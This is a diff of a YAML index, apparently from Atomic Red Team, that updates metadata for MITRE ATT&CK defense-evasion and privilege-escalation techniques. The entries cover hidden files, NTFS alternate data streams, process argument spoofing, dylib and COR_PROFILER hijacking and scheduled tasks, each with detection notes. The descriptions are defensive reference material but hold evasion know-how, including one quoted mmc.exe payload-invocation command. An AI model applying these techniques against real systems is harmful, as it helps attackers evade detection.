+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13648,7 +13936,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13676,48 +13964,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13726,6 +13977,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13734,20 +13988,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13804,6 +14089,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13814,13 +14100,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13879,11 +14164,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13923,8 +14207,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -13932,13 +14218,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -13969,9 +14255,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests:
     - name: Creating GCP Service Account and Service Account Key
@@ -14149,7 +14432,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14171,11 +14454,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14242,8 +14524,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14261,7 +14543,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14364,12 +14645,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14382,6 +14662,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14418,17 +14699,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14474,9 +14755,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14514,7 +14792,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14533,7 +14811,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14564,7 +14841,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14588,12 +14865,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14677,7 +14952,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14699,7 +14973,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14733,12 +15007,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14790,9 +15062,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14861,7 +15132,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14908,7 +15178,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14921,12 +15191,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -15005,7 +15276,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15027,7 +15298,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -15070,7 +15340,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15094,8 +15364,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15143,7 +15411,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15181,8 +15449,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15231,7 +15497,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15283,29 +15549,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15352,7 +15617,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15384,8 +15649,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15399,6 +15664,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15411,11 +15680,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15481,7 +15753,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15570,7 +15841,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15658,7 +15928,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15743,7 +16012,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15775,7 +16043,7 @@ privilege-escalation:
